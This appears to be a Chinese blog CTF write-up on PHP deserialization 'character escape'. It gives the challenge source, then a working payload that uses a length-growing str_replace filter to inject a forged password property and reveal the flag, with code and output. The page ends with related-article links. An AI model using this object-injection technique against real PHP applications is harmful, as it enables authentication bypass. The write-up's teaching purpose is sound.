PHP反序列化之字符逃逸

最新推荐文章于 2023-12-27 20:02:48 发布
最新推荐文章于 2023-12-27 20:02:48 发布
阅读量149 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72667582/article/details/131430572
版权

原题如下

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

以下是分析过程:

由代码可得uname是GET方式传入的,password是默认值1

仅当password="yu22x"时,才能得到flag

我先构造一个理想的情况,就是password="yu22x"时的反序列化

<?php
class a
{
    public $uname="fff";
    public $password="yu22x";
//    public function __construct($uname,$password)
//    {
//        $this->uname=$uname;
//        $this->password=$password;
//    }
//    public function __wakeup()
//    {
//        if($this->password==='yu22x')
//        {
//            include('flag.php');
//            echo $flag;
//        }
//        else
//        {
//            echo 'wrong password';
//        }
//    }
}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

//$uname=$_GET[1];
//$password=1;
//$ser=filter(serialize(new a($uname,$password)));
//$test=unserialize($ser);

$aa =new a();
$a1=serialize($aa);
echo $a1;
$a2=filter(serialize($aa));
echo $a2;
var_dump(unserialize($a2));



O:1:"a":2:{s:5:"uname";s:3:"fff";s:8:"password";s:5:"yu22x";}O:1:"a":2:{s:5:"uname";s:3:"fff";s:8:"password";s:5:"yu22x";}object(a)#2 (2) {
  ["uname"]=>
  string(3) "fff"
  ["password"]=>
  string(5) "yu22x"
}

因为题目里password被定死了是1,所以考虑字符串逃逸的方法,我的理解字符串逃逸和sql注入本质都是一样的,都是闭合,就是要把反序列化后的字符串给闭合了

<?php
$aa='O:1:"a":2:{s:5:"uname";s:3:"fff";s:8:"password";s:5:"yu22x";}abcd';
var_dump($aa);



string(65) "O:1:"a":2:{s:5:"uname";s:3:"fff";s:8:"password";s:5:"yu22x";}abcd"

可以看到闭合后的字符串后面的一堆(abcd)是一点用没有的,因此我们可以利用这个特性来闭合

image-20230628080422793

<?php
class a
{
    public $uname='FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}';//Firebasky*15
    public $password=1;
//    public function __construct($uname,$password)
//    {
//        $this->uname=$uname;
//        $this->password=$password;
//    }
//    public function __wakeup()
//    {
//        if($this->password==='yu22x')
//        {
//            include('flag.php');
//            echo $flag;
//        }
//        else
//        {
//            echo 'wrong password';
//        }
//    }
}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

//$uname=$_GET[1];
//$password=1;
//$ser=filter(serialize(new a($uname,$password)));
//$test=unserialize($ser);

$aa =new a();
$a1=serialize($aa);
echo $a1;
echo "|||";
$a2=filter(serialize($aa));
echo $a2;
var_dump(unserialize($a2));




O:1:"a":2:{s:5:"uname";s:165:"FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}|||O:1:"a":2:{s:5:"uname";s:165:"FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}object(a)#2 (2) {
  ["uname"]=>
  string(165) "FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup"
  ["password"]=>
  string(5) "yu22x"
}

因为;s:8:“password”;s:5:“yu22x”;}这30个字符要被填充,而一次filter过后会增加两个字符,因此30/2=15,要重复15次才能成功反序列化

b3nguang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php json与xml序列化/反序列化
10-26
在WEB开发中,php对象的序列化与反序列化经常使用,比较主流的有json格式与xml格式的序列化与反序列化。今天我们就来看看是如何用的。
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1163
php反序列化字符逃逸
php反序列化-字符逃逸-增减多个字符
m0_61867082的博客
07-29 278
众所周知php反序列化字符逃逸,分为2种类型(字符串增多,字符串减少)。但网上大多数文章讲的都是增加一个字符或者减少一个字符串。对于增加减少多个字符串进行逃逸的文章,却少有人提及。本篇文章在特定源码的基础上,对增加减少多个字符串的情况进行简单分析。需要你有一定的字符逃逸理论基础。如有错误欢迎批评指正。先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面。先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面。假设前提必须使用admin才行。假设前提必须使用admin才行。
ctfshow月饼杯 web_wp
西部壮仔的博客
11-11 387
web1_此夜圆 ​ 题目如下 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->passwo
PHP反序列化字符逃逸
v2ish1yan的博客
04-15 1678
php反序列化字符逃逸
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
详解php反序列化
10-15
主要介绍了php反序列化的相关知识,文中讲解非常细致,代码帮助各位更好的理解和学习,感兴趣的朋友可以了解下
JSON PHP中,Json字符反序列化成对象/数组的方法
10-18
今天小编就为大家分享一篇JSON PHP中,Json字符反序列化成对象/数组的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
JavaScript实现的反序列化json字符串操作示例
10-18
主要介绍了JavaScript实现的反序列化json字符串操作,结合实例形式分析了eval与JSON.parse两种反序列化json字符串的相关操作技巧,需要的朋友可以参考下
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
PHP反序列化_02字符逃逸(小白学习记录ing)
最新发布
m0_74408192的博客
12-27 434
今天讲讲字符逃逸。题目中可能会用它把flag藏起来。
PHP字符逃逸导致的对象注入
山有山的高度,海有海的胸怀。
11-23 2522
1.漏洞产生原因: 序列化的字符串在经过过滤函数不正确的处理而导致对象注入,目前看到都是因为过滤函数放在了serialize函数之后,要是放在序列化之前应该就不会产生这个问题 ?php function filter($string){ $a = str_replace('x','zz',$string); return $a; } $username = "tr1ple";...
web学习(php反序列化长度变化尾部字符逃逸)
weixin_44897902的博客
11-02 1159
BUUCTF piapiapia(php反序列化长度变化尾部字符逃逸) 引用: https://blog.csdn.net/zz_Caleb/article/details/96777110 前提知识: md5(Array()) = null sha1(Array()) = null ereg(pattern,Array()) = null preg_match(pattern,Ar...
浅析php反序列化字符逃逸
Lemon's blog
08-26 3026
前言: php反序列化字符逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
PHP反序列化字符逃逸详解
qq_45521281的博客
07-05 7503
文章目录第一种情况:替换修改后导致序列化字符串变长例题——[0CTF 2016]piapiapia第二种情况——替换之后导致序列化字符串变短实例——[安洵杯 2019]easy_serialize_php 此类题目的本质就是改变序列化字符串的长度,导致反序列化漏洞 这种题目有个共同点: php序列化后的字符串经过了替换或者修改,导致字符串长度发生变化。 总是先进行序列化,再进行替换修改操作。 第一种情况:替换修改后导致序列化字符串变长 示例代码: <?php function filter($st
php反序列化字符逃逸是什么
02-07
PHP 中,反序列化是指将序列化的字符串转换为原来的 PHP 对象。但是,如果字符串中含有恶意代码,反序列化过程就可能导致漏洞的产生。这种情况就称为“反序列化字符逃逸”。 举个例子,假设你有一个函数可以将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值